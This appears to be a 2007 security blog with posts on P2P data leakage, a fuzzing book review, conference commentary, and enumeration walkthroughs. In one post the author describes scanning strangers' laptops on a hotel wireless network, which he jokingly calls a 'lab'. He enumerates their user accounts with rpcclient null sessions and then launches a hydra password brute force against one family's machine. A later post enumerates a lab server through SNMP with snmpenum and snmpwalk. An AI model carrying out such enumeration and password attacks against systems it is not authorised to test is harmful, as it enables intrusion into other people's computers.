Tuesday, July 31, 2007

Information Leaking via P2P


There are a couple of Blog posts about classified/sensitive information leakage via P2P. Original article is here.

Blogs I read about it on here #1 & #2

Page 3 of the networkworld article is the best when it describes how some of these leakages occurred, thankfully it seems mostly through family members downloading and installing P2P software on the company computers, which is refreshing from the company idiot leaving the laptop in the car waiting for it to be stolen and contribute more to identity theft.

The fix for this in my opinion is not some fancy network appliance. Most networks if they don't want to allow P2P traffic can block the traffic, its not that hard. What you cant block is what that "road warrior" employee does when they leave the work network and plug into the hotel wireless or the cable modem at home.

So what's the fix?

1. (Most Importantly its) User Education: when that person signs for a laptop to use, give them some education(pamphlet, talking to, tattooed on their head, etc) and make them sign an user agreement that specifically states what that person can and cannot do on that company laptop (seems like now you have to remind them not to let your spouse/kid play on that laptop too). Yearly education is another good option if the organization supports it but its got to be worth the user's time and actually be beneficial, aka not a check the block thing and not the same stuff every year.

2. Configuration Management: If you allow that laptop to connect back to your network it should be scanned, patched and the AV updated before it gets back on the network, hopefully at that time you can catch unauthorized software installed.

While it wouldn't help the P2P problem, encrypting data at rest will help with those stolen laptops as well.

The Continous Compliance mentioned in the ncircle blog (link #2) also seems like a good idea, havent looked at any solutions that do that though. Guess you have to balance the risk of a new remote application that you allow access into your network (mmmm yummy) against knowing sooner that someone installed unauthorized software on your company laptop.

3. Actually Punish Rule Breakers: those people that lost the laptops with the VA data should have been hung out to dry, especially the one that wasn't authorized to take data home to work on. If TJ Maxx can be held liable for millions for using WEP instead WPA, the jackass that takes a laptop or data home when they aren't supposed to (especially with PII) should be fired if the data loss can be attributed to negligence on their part. The guy who's daughter installed lime-wire...canned, next time pay attention to what your kid/spouse is doing on the company laptop and don't let them do it. If you are too technically inept or just plain don't care about security then shouldn't be able to check out laptops with corporate data

I'm a big believer in that if you punish people when they do something wrong, others will be inclined NOT to do what that person did in the interest of self preservation. It serves two purposes. First, if the punishment is severe enough it should curb repeat offenses and second, it shows the public (if you answer to them) that you care and you did something to the offender to "right the wrong." I'd be alot (well maybe not that much) less pissed if they fired the guy that lost the data with my PII than if they just got a slap on the wrist.

-CG
CG

Support Information Security Day


As we get ready to head out to Vegas for Defcon I wanted to put in a plug for Infomation Security Day.

From the website:
Information Security Day was started to spread the awareness of information security issues. Information Security, also known as Information Systems Security (INFOSEC) deals with the different aspects of information and its protection. Information Security Day aims at reducing the risk associated with the information systems by increasing the awareness of user community. The INFOSec Day aims at increasing the awareness in the following areas:

>> Understanding the various information system components
>> Security Management Principles
>> Risk Assessment, Sensitivity and Criticality
>> Disaster Recover and Emergency Procedures
>> Logical Security
>> Physical Security
>> Managerial Security Measures

http://www.informationsecurityday.com/
CG

Sunday, July 29, 2007

Enumerating user accounts on Linux and OS X with rpcclient


Yeah so i was bored on the hotel wireless...errr lab...and started seeing who had ports 135, 139, 445 open. I found one guy running OS X 10.4 with Samba running and one guy running Ubuntu with Samba running, oh and also one guy running XP SP0/1 vulnerable to DCOM (wont even go down that road). Using rpcclient we can enumerate usernames on those OS's just like a windows OS. Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services :-)

so lets run rpcclient with no options to see what's available:

SegFault:~ cg$ rpcclient
Usage: rpcclient [OPTION...]
-c, --command=COMMANDS Execute semicolon separated cmds
-I, --dest-ip=IP Specify destination IP address

Help options
-?, --help Show this help message
--usage Display brief usage message

Common samba options:
-d, --debuglevel=DEBUGLEVEL Set debug level
-s, --configfile=CONFIGFILE Use alternative configuration file
-l, --log-basename=LOGFILEBASE Basename for log/debug files
-V, --version Print version

Connection options:
-O, --socket-options=SOCKETOPTIONS socket options to use
-n, --netbiosname=NETBIOSNAME Primary netbios name
-W, --workgroup=WORKGROUP Set the workgroup name
-i, --scope=SCOPE Use this Netbios scope

Authentication options:
-U, --user=USERNAME Set the network username
-N, --no-pass Don't ask for a password
-k, --kerberos Use kerberos (active directory)
authentication
-A, --authentication-file=FILE Get the credentials from a file
-S, --signing=on|off|required Set the client signing state
-P, --machine-pass Use stored machine account password

Once we are connected using a null session we get another set of options:

SegFault:~ cg$ rpcclient -U "" 192.168.182.36
Password:
timeout connecting to 192.168.182.36:445
rpcclient $> help
--------------- ----------------------
SHUTDOWN
shutdowninit Remote Shutdown (over shutdown pipe)
shutdownabort Abort Shutdown (over shutdown pipe)
--------------- ----------------------
ECHO
echoaddone Add one to a number
echodata Echo data
sinkdata Sink data
sourcedata Source data
--------------- ----------------------
REG
shutdown Remote Shutdown
abortshutdown Abort Shutdown
--------------- ----------------------
DFS
dfsexist Query DFS support
dfsadd Add a DFS share
dfsremove Remove a DFS share
dfsgetinfo Query DFS share info
dfsenum Enumerate dfs shares
--------------- ----------------------
SRVSVC
srvinfo Server query info
netshareenum Enumerate shares
netfileenum Enumerate open files
netremotetod Fetch remote time of day
--------------- ----------------------
NETLOGON
logonctrl2 Logon Control 2
getdcname Get trusted DC name
logonctrl Logon Control
samsync Sam Synchronisation
samdeltas Query Sam Deltas
samlogon Sam Logon
change_trust_pw Change Trust Account Password
--------------- ----------------------
SPOOLSS
adddriver Add a print driver
addprinter Add a printer
deldriver Delete a printer driver
deldriverex Delete a printer driver with files
enumdata Enumerate printer data
enumdataex Enumerate printer data for a key
enumkey Enumerate printer keys
enumjobs Enumerate print jobs
enumports Enumerate printer ports
enumdrivers Enumerate installed printer drivers
enumprinters Enumerate printers
getdata Get print driver data
getdataex Get printer driver data with keyname
getdriver Get print driver information
getdriverdir Get print driver upload directory
getprinter Get printer info
openprinter Open printer handle
setdriver Set printer driver
getprintprocdir Get print processor directory
addform Add form
setform Set form
getform Get form
deleteform Delete form
enumforms Enumerate forms
setprinter Set printer comment
setprintername Set printername
setprinterdata Set REG_SZ printer data
rffpcnex Rffpcnex test
--------------- ----------------------
SAMR
queryuser Query user info
querygroup Query group info
queryusergroups Query user groups
queryuseraliases Query user aliases
querygroupmem Query group membership
queryaliasmem Query alias membership
querydispinfo Query display info
querydominfo Query domain info
enumdomusers Enumerate domain users
enumdomgroups Enumerate domain groups
enumalsgroups Enumerate alias groups
createdomuser Create domain user
samlookupnames Look up names
samlookuprids Look up names
deletedomuser Delete domain user
samquerysecobj Query SAMR security object
getdompwinfo Retrieve domain password info
lookupdomain Lookup Domain Name
--------------- ----------------------
LSARPC-DS
dsroledominfo Get Primary Domain Information
dsenumdomtrusts Enumerate all trusted domains in an AD forest
--------------- ----------------------
LSARPC
lsaquery Query info policy
lookupsids Convert SIDs to names
lookupnames Convert names to SIDs
enumtrust Enumerate trusted domains
enumprivs Enumerate privileges
getdispname Get the privilege name
lsaenumsid Enumerate the LSA SIDS
lsaenumprivsaccount Enumerate the privileges of an SID
lsaenumacctrights Enumerate the rights of an SID
lsaaddacctrights Add rights to an account
lsaremoveacctrights Remove rights from an account
lsalookupprivvalue Get a privilege value given its name
lsaquerysecobj Query LSA security object
--------------- ----------------------
GENERAL OPTIONS
help Get help on commands
? Get help on commands
debuglevel Set debug level
list List available commands on
exit Exit program
quit Exit program
sign Force RPC pipe connections to be signed
seal Force RPC pipe connections to be sealed
schannel Force RPC pipe connections to be sealed with 'schannel' (NETSEC). Assumes valid machine account to this domain controller.
schannelsign Force RPC pipe connections to be signed (not sealed) with 'schannel' (NETSEC). Assumes valid machine account to this domain controller.
none Force RPC pipe connections to have no special properties


Lets play with a few options:

rpcclient $> enumprivs
found 5 privileges

SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SaAddUsers 0:65281 (0x0:0xff01)
SaPrintOp 0:65283 (0x0:0xff03)


Enumerating shares:

rpcclient $> netshareenum
netname: IPC$
remark: IPC Service (Mac OS X)
path: C:\tmp
password:
netname: ADMIN$
remark: IPC Service (Mac OS X)
path: C:\tmp
password:
netname: PSC 2170 Series
remark: PSC 2170 Series
path: C:\tmp
password:


Samba/OS info:

rpcclient $> srvinfo
LEWISFAMILY Wk Sv PrQ Unx NT SNT Mac OS X
platform_id : 500
os version : 4.9
server type : 0x9a03


Using "lookupnames" we can get the SID. Once we have "a" SID we can enumerate the rest.

rpcclient $> lookupnames root
root S-1-5-21-1835020781-2383529660-3657267081-1000 (User: 1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-500
S-1-5-21-1835020781-2383529660-3657267081-500 LEWISFAMILY\Administrator (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-501
S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-502
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1001
S-1-5-21-1835020781-2383529660-3657267081-1001 LEWISFAMILY\wheel (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000
S-1-5-21-1835020781-2383529660-3657267081-1000 LEWISFAMILY\root (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1002
S-1-5-21-1835020781-2383529660-3657267081-1002 LEWISFAMILY\daemon (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1003
S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupnames guest
guest S-1-5-21-1835020781-2383529660-3657267081-1063 (Local Group: 4)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1005
S-1-5-21-1835020781-2383529660-3657267081-1005 LEWISFAMILY\kmem (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1004
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1006
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1007
S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1008
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1009
S-1-5-21-1835020781-2383529660-3657267081-1009 LEWISFAMILY\tty (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1010
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1011
S-1-5-21-1835020781-2383529660-3657267081-1011 LEWISFAMILY\operator (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1012
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013
S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1014
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1015
S-1-5-21-1835020781-2383529660-3657267081-1015 LEWISFAMILY\bin (2)
rpcclient $> lookupnames lewis
lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001
result was NT_STATUS_NONE_MAPPED
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2003
S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2)
rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2004
result was NT_STATUS_NONE_MAPPED


You get the idea, was pretty much the same for the Ubuntu guy cept that his user accounts were -3000.

now that i have some user accounts...

ATTACK!!!

SegFault:~/Documents/Evil cg$ hydra -l lewis -P common-passwords.txt 192.168.182.36 smb -V
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46
[DATA] 1 tasks, 1 servers, 816 login tries (l:1/p:816), ~816 tries per task
[DATA] attacking service smb on port 139
[STATUS] 29.00 tries/min, 29 tries in 00:01h, 787 todo in 00:28h
...


yet another reason to adjust your file & printer sharing configurations when you take your computer on the road (especially if you share your My Documents folder)

-CG
CG

Book Review: Fuzzing: Brute Force Vulnerability Discovery




Fuzzing: Brute Force Vulnerability Discovery

By Michael Sutton, Adam Greene, Pedram Amini

“Great on Theory…Pretty Good on Execution”

Four Stars

I anxiously awaited reading and putting this book to use. Fuzzing is one of those “mystical” concepts that the people cranking out exploits were doing and I wanted to be able to use some of the publicly available fuzzers to fuzz for vulnerabilities and join the ranks.

From the back cover: “…Now, its your turn. In this book, renowned fuzzing experts show you how to use fuzzing to reveal weaknesses in your software before someone else does.”

I thought the book excellently covered the theory portions of fuzzing. The format of theory/background of a fuzzing method (Environment Variable and Argument Fuzzing, Web Application and Server fuzzing, File Format Fuzzing, Network Protocol Fuzzing, Web Browser Fuzzing, and In-Memory Fuzzing) followed with that fuzzing method Automation or on Unix and then on Windows worked perfectly. It was a good structure and informative. The Automation or Unix and Windows sections fit in well with the theory sections before it.

I think the book falls a bit short on practical execution (case studies) of using the fuzzing tools. Granted I say this based on my own expectations of what I would like to see from a fuzzing book but also from what the authors say in the preface that we will get out of the book. They say, “We detail numerous vulnerabilities throughout the book and discuss how they might have been identifies through fuzzing.” Some of the case studies are exactly what I expected like case studies in Chapter 10, the fuzzing with SPIKE section in Chapter 15, and the Complete Walkthru with Sulley in Chapter 21. Some of the others fall a bit short. I expected a lot more out of the ActiveX fuzzing sections (chapter 18), the Shockwave Flash example in Chapter 21 was useful for the discussion of creating a test case for a protocol but after 11 pages of mostly code in the last section we basically get told to load it into PaiMei and “go fuzz”, and while the theory parts of chapter’s 7 & 8 were great, telling me to find an AIX 5.3 box to see some example environment variables and argument vulnerabilities was less than useful. It would have been much more useful to use some of today’s fuzzing tools to find some old vulnerabilities in something like *BSD or old RedHat distributions, something I might have in the lab or at least something I could install in VMWare.

Likes: Theory, background, discussion of how and why they built the “author built” fuzzers they cover in the book, some of the case studies gave me everything I needed to reproduce on my own in the lab. Providing the fuzzers on the companion website was great as well. The George Bush quotes were hilarious as well and made me look forward to each chapter so I could get another quote.

Dislikes: some of the case studies I don’t think went into enough detail (no step by step instructions), I think the explanations of the blocks of code could have been better and numbering lines so we could refer to them in the text would have helped. The discussion of the existing frameworks was a little bit light (but we do get told to go the companion website for more info). Ideally we would have walked thru a couple of easy examples using multiple fuzzer frameworks to get us from advisory to EIP= 0x41414141. That would have been nice to see.

Overall a great book, it has a place on the bookshelf next to shellcoder’s handbook and some other programming books and it will be used (many times) as a reference to play with the various fuzzers available out there.

CG

Monday, July 23, 2007

Thoughts on Security Conferences versus Practical Knowledge


Over on SecurityFocus.com Don Parker posted an article on Security conferences versus practical knowledge.

Overall I see his point that the talks given at the average security conference actually gives little to the average participant to bring home to put into effect into his/her network. He asserts that the training given at conference (usually 2+ days before the talks) is top notch but the speakers fall short. He also says that a security conference focusing on "practical knowledge" would be far better.

From the article:
"Today's computer security conferences no longer offer relevant or practical knowledge to the attendee. Be honest now, when was the last computer security conference that you went to where you came away from with several ideas to implement immediately onto your networks? I would wager none. "
...
"What my not making the cut sank home for me though was that there are precious little practical talks going on today at computer security conferences."

Some thoughts on those quotes:
We have done this to ourselves by demanding that we hear talks on the latest research and 0-day, brand new exploit attack vector, uber l33t hack tool, etc when we go to these security conferences. At some point we moved away from talks on practical widespread attack vectors on our network to teeny tiny attack vectors because all the "practical talks" have been given already and why do people want to pay tons of money to hear someone talk about research or information that everyone already knows?

When was the last time i got something useful from a security conference? The last con i went to was shmoocon 07 (My posts on EH.net about it 1, 2, & 3)and while i wasnt able to go back to work, sit down at the domain admin MMC or router console and make changes that secured my network i still got alot out of the con. You can read my day by day if you want, but i'll assert that being able go back and make a change or implement something new on your network after a security con attendance is a poor metric to judge a conference selection of speakers or the value of the conference. Talks i did get alot out of were:

Avi Rubin's keynote talk on vulnerability disclosure. Do i do this every day, no. But great information to know when i have a enough fu to worry about doing disclosures.

Matt Fisher, Cygnus, and PresMike's talk on Web Application Incident Preparation. Again, i dont run a web server but if i did i would have gone back and looked at what we had in place to deal with incidents that could occur thru my web app.

I missed Richard Bejtlich's talk but i'll wager it was worth listening to :-)

Chris Paget's talk on WPAD, if we were using it, would have been a talk i would have had to sit down at the keyboard and do some fixing on.

There was more, i wont list them all, hell even the guys talking about guns was worthwhile but not something i could have used at work.

Link to the speakers

so what's my point???!!! first another quote...

"It is not everybody who can attend today's cutting edge security conferences and actually walk away having learned something. What is it that you are going to get out of it, and just how will it benefit our network? If the answers aren't there, you're not going. Practical knowledge is where it is at."

My point is that i think people (anyone if they have some brain cells and interest) do get things out of conferences even if they cant directly put it into action at work. New ways of thinking about attacking problems, hearing about things that will most likely become issues later, in my opinion is invaluable much for the same reason that subscribing to security mailing lists has value despite the noise, already knowing about that exploit you see on CNN or some of the other online computer site a few days after the code was dropped has value. Frankly being around some of the researchers that have that much "fu" is also valuable because it can show you that what's out in public knowledge about a system is probably not even remotely all that is known or doable with the system not to mention just the inspiration of being around some of these people with that much security brainpower. You wanna get motivated, go listen to Dan Kaminsky talk about bending DNS packets to his will or HD Moore 0wning some un-ownable app, or if packet fu is your thing go listen to Richard Bejtlich or if you are into reversing go listen to Havlar Flake. if that doesnt inspire you to do some work in the home lab or crack a book to be a better security guy/gal, well i dont know what to tell you except to maybe look at why you are in the field.

More random thoughts on the above quote:
At least it can maybe now justify the cost of training you can take at the conference since you usually get access to the talks for free if you took the training. On the other hand, how often has it been that the "obscure non-practical theory/idea" talk actually turned into a huge attack vector? I'm sure the people that first listened to a talk on the supposed vulnerabilities in WEP didn’t really come home with the "practical knowledge" to do anything about it on their networks, but we see later how widespread and dangerous of an attack vector it was. Unfortunately people don’t give a crap about a new vector (it isn’t practical yet) unless the guy is dropping a kiddie friendly tool anyway, then maybe they'll go home and fix or upgrade the network to defend against the attack.

If we do go the "practical knowledge" con route:
Another thing to think about is how do I justify to my boss sending me to a conference where they are going to talk about "practical knowledge" that I can 1) probably get in town from a local training center or 2) from a book for significantly less cost?

Don’t get me wrong, I’m all for a conference where I get something practical out of every talk but I would think its hard to organize a con like that because what might be new information for me might be old news to you. Of course that's probably why there are different tracks and more than one talk going on a time. Valid points though, something for those con organizers to think about at speaker selection time.

Wrap up:
so all that yaking, what's the point? the point, if you just scrolled down to the bottom, is that being able go back and make a change or implement something new on your network after a security con attendance is a poor metric to judge a conference selection of speakers or the value of the conference or of conference attendance. The value of a security conference is more than the talks and beer drinking (both important parts though) that can be done at the conference. The inspiration to do/learn more, exposure to new concepts/methods, and networking with like-minded individuals can pay dividends later as well.
CG

Sunday, July 22, 2007

Why GoogleAds rule...


CG

Hey that's my vid they're talking about!


Over on darknet.org.uk they had a post on metasploit and said that my video i posted over on EthicalHacker.net was "The most up to date video for Metasploit 3 can be found here:"

The post

Of course if anyone there was an LSO Member they would have saw those videos a long time ago :-)

The videos in question... Part 1 & Part 2

-CG
CG

Saturday, July 21, 2007

SNMP enumeration with snmpenum and snmpwalk


Over in LSO-Chat we were talking about SNMP Enumeration and why you would want to do that and what kind of information you could pull from a SNMP service even with only READ permissions available.

So let's run snmpenum.pl (one of many snmp enumeration utilities) against a Windows 2000 server with the SNMP installed (not installed by default)

[root@localhost snmpenum]# perl snmpenum.pl
Usage: perl enum.pl

[root@localhost snmpenum]# perl snmpenum.pl 192.168.38.200 public windows.txt

----------------------------------------
INSTALLED SOFTWARE
----------------------------------------

freeSSHd 1.0.9
freeFTPd 1.0.8
CesarFTP 0.99g
Microsoft SQL Server 2000
PeerCast (remove only)
TFTP Server TFTPDWIN version 0.4.2
Bitvise WinSSHD 4.19 (remove only)
VMware Tools
WebFldrs
UltraVNC v1.0.2

----------------------------------------
UPTIME
----------------------------------------

2 hours, 19:02.87

----------------------------------------
HOSTNAME
----------------------------------------

LSO-DEV

----------------------------------------
USERS
----------------------------------------

Guest
Asmith
Bsmith
Dsmith
Esmith
Fsmith
Gsmith
Hsmith
Jsmith
Ksmith
Lsmith
Msmith
Nsmith
Osmith
Psmith
Qsmith
Rsmith
Ssmith
Tsmith
Usmith
Vsmith
Wsmith
Xsmith
Ysmith
Zsmith
csmith
meanie
linneag
Administrator
TsInternetUser
IUSR_VICTIM-W2K
IWAM_VICTIM-W2K

----------------------------------------
DISKS
----------------------------------------

A:\
C:\ Label: Serial Number 20e619b8
D:\ Label:WIN2000_EN Serial Number f1a3fc3
Virtual Memory

----------------------------------------
RUNNING PROCESSES
----------------------------------------

System Idle Process
System
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
sqlmangr.exe
svchost.exe
SPOOLSV.EXE
VMwareTray.exe
llssrv.exe
FreeSSHDService
explorer.exe
FreeFTPDService
svchost.exe
sqlservr.exe
regsvc.exe
mstask.exe
svchost.exe
snmp.exe
VMwareService.e
winmgmt.exe
WinSSHD.exe
winvnc.exe
dfssvc.exe
inetinfo.exe
mssearch.exe
IEXPLORE.EXE
badblue.exe
sshdctrl.exe
tftpd.exe
VMwareUser.exe

----------------------------------------
LISTENING UDP PORTS
----------------------------------------

135
161
445
1029
1034
1434
3456

----------------------------------------
SYSTEM INFO
----------------------------------------

Hardware: x86 Family 15 Model 2 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)

----------------------------------------
SHARES
----------------------------------------

----------------------------------------
LISTENING TCP PORTS
----------------------------------------

21
22
25
80
135
443
445
1030
1032
1035
2121
5800
5900
6941
8080
55555

----------------------------------------
SERVICES
----------------------------------------

Server
Alerter
WinSSHD
Event Log
Messenger
Net Logon
Telephony
DNS Client
VNC Server
DHCP Client
MSSQLSERVER
Workstation
SNMP Service
Windows Time
Plug and Play
Print Spooler
RunAs Service
Task Scheduler
FreeSSHDService
freeFTPdService
Computer Browser
Microsoft Search
COM+ Event System
IIS Admin Service
Protected Storage
Removable Storage
IPSEC Policy Agent
Network Connections
Logical Disk Manager
VMware Tools Service
FTP Publishing Service
Distributed File System
License Logging Service
Remote Registry Service
Security Accounts Manager
System Event Notification
Remote Procedure Call (RPC)
TCP/IP NetBIOS Helper Service
NT LM Security Support Provider
Distributed Link Tracking Client
World Wide Web Publishing Service
Windows Management Instrumentation
Simple Mail Transport Protocol (SMTP)
Windows Management Instrumentation Driver Extensions

----------------------------------------
DOMAIN
----------------------------------------

LSOCORP

[root@localhost snmpenum]#

Not a bad little bit of info. Now, realistically would you see this from outside the firewall, I hope not. But on an internal assessment you may be able to use SNMP to pull off a list of username to try some password attacks, verify patch level, check out what ports are listening, and see running services. All kinds of fun stuff.

another fun tool is snmpwalk. its not for the faint of heart, you need to know what MIB you are looking for otherwise you can get information overload.

Running it with no options will give you usage info:

[root@localhost snmpenum]# snmpwalk
No hostname specified.
USAGE: snmpwalk [OPTIONS] AGENT [OID]

Version: 5.2.1.2
Web: http://www.net-snmp.org/
Email: net-snmp-coders@lists.sourceforge.net

OPTIONS:
-h, --help display this help message
-H display configuration file directives understood
-v 1|2c|3 specifies SNMP version to use
-V, --version display package version number
SNMP Version 1 or 2c specific
-c COMMUNITY set the community string
SNMP Version 3 specific
-a PROTOCOL set authentication protocol (MD5|SHA)
-A PASSPHRASE set authentication protocol pass phrase
-e ENGINE-ID set security engine ID (e.g. 800000020109840301)
-E ENGINE-ID set context engine ID (e.g. 800000020109840301)
-l LEVEL set security level (noAuthNoPriv|authNoPriv|authPriv)
-n CONTEXT set context name (e.g. bridge1)
-u USER-NAME set security name (e.g. bert)
-x PROTOCOL set privacy protocol (DES|AES)
-X PASSPHRASE set privacy protocol pass phrase
-Z BOOTS,TIME set destination engine boots/time
General communication options
-r RETRIES set the number of retries
-t TIMEOUT set the request timeout (in seconds)
Debugging
-d dump input/output packets in hexadecimal
-D TOKEN[,...] turn on debugging output for the specified TOKENs
(ALL gives extremely verbose debugging output)
General options
-m MIB[:...] load given list of MIBs (ALL loads everything)
-M DIR[:...] look in given list of directories for MIBs
-P MIBOPTS Toggle various defaults controlling MIB parsing:
u: allow the use of underlines in MIB symbols
c: disallow the use of "--" to terminate comments
d: save the DESCRIPTIONs of the MIB objects
e: disable errors when MIB symbols conflict
w: enable warnings when MIB symbols conflict
W: enable detailed warnings when MIB symbols conflict
R: replace MIB symbols from latest module
-O OUTOPTS Toggle various defaults controlling output display:
0: print leading 0 for single-digit hex characters
a: print all strings in ascii format
b: do not break OID indexes down
e: print enums numerically
E: escape quotes in string indices
f: print full OIDs on output
n: print OIDs numerically
q: quick print for easier parsing
Q: quick print with equal-signs
s: print only last symbolic element of OID
S: print MIB module-id plus last element
t: print timeticks unparsed as numeric integers
T: print human-readable text along with hex strings
u: print OIDs using UCD-style prefix suppression
U: don't print units
v: print values only (not OID = value)
x: print all strings in hex format
X: extended index format
-I INOPTS Toggle various defaults controlling input parsing:
b: do best/regex matching to find a MIB node
h: don't apply DISPLAY-HINTs
r: do not check values for range/type legality
R: do random access to OID labels
u: top-level OIDs must have '.' prefix (UCD-style)
s SUFFIX: Append all textual OIDs with SUFFIX before parsing
S PREFIX: Prepend all textual OIDs with PREFIX before parsing
-L LOGOPTS Toggle various defaults controlling logging:
e: log to standard error
o: log to standard output
n: don't log at all
f file: log to the specified file
s facility: log to syslog (via the specified facility)

(variants)
[EON] pri: log to standard error, output or /dev/null for level 'pri' and above
[EON] p1-p2: log to standard error, output or /dev/null for levels 'p1' to 'p2'
[FS] pri token: log to file/syslog for level 'pri' and above
[FS] p1-p2 token: log to file/syslog for levels 'p1' to 'p2'
-C APPOPTS Set various application specific behaviours:
p: print the number of variables found
i: include given OID in the search range
I: don't include the given OID, even if no results are returned
c: do not check returned OIDs are increasing
t: Display wall-clock time to complete the request
[root@localhost snmpenum]#

As you can see, its a stout program.

i'll run it against the same box as we did with snmpenum.pl

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 2c
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 2 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.2
SNMPv2-MIB::sysUpTime.0 = Timeticks: (887110) 2:27:51.10
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: LSO-DEV
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 76
---BIG BIG SNIP--

we can use grep to narrow down some info. If you have grep kung fu you can use some "cuts" to get just the software name.

Installed Software:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 | grep hrSWInstalledName
HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "freeSSHd 1.0.9"
HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "freeFTPd 1.0.8"
HOST-RESOURCES-MIB::hrSWInstalledName.3 = STRING: "CesarFTP 0.99g"
HOST-RESOURCES-MIB::hrSWInstalledName.4 = STRING: "Microsoft SQL Server 2000"
HOST-RESOURCES-MIB::hrSWInstalledName.5 = STRING: "PeerCast (remove only)"
HOST-RESOURCES-MIB::hrSWInstalledName.6 = STRING: "TFTP Server TFTPDWIN version 0.4.2"
HOST-RESOURCES-MIB::hrSWInstalledName.7 = STRING: "Bitvise WinSSHD 4.19 (remove only)"
HOST-RESOURCES-MIB::hrSWInstalledName.8 = STRING: "VMware Tools"
HOST-RESOURCES-MIB::hrSWInstalledName.9 = STRING: "WebFldrs"
HOST-RESOURCES-MIB::hrSWInstalledName.10 = STRING: "UltraVNC v1.0.2"
[root@localhost snmpenum]#

Listening UDP Ports:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 | grep udpLocalPort
UDP-MIB::udpLocalPort.0.0.0.0.135 = INTEGER: 135
UDP-MIB::udpLocalPort.0.0.0.0.161 = INTEGER: 161
UDP-MIB::udpLocalPort.0.0.0.0.445 = INTEGER: 445
UDP-MIB::udpLocalPort.0.0.0.0.1029 = INTEGER: 1029
UDP-MIB::udpLocalPort.0.0.0.0.1034 = INTEGER: 1034
UDP-MIB::udpLocalPort.0.0.0.0.1434 = INTEGER: 1434
UDP-MIB::udpLocalPort.0.0.0.0.3456 = INTEGER: 3456
UDP-MIB::udpLocalPort.127.0.0.1.1053 = INTEGER: 1053
UDP-MIB::udpLocalPort.192.168.38.200.137 = INTEGER: 137
UDP-MIB::udpLocalPort.192.168.38.200.138 = INTEGER: 138
UDP-MIB::udpLocalPort.192.168.38.200.500 = INTEGER: 500
[root@localhost snmpenum]#

Enumerating users on the box:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 1.3 | grep 77.1.2.25
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.65.115.109.105.116.104 = STRING: "Asmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.66.115.109.105.116.104 = STRING: "Bsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.68.115.109.105.116.104 = STRING: "Dsmith"
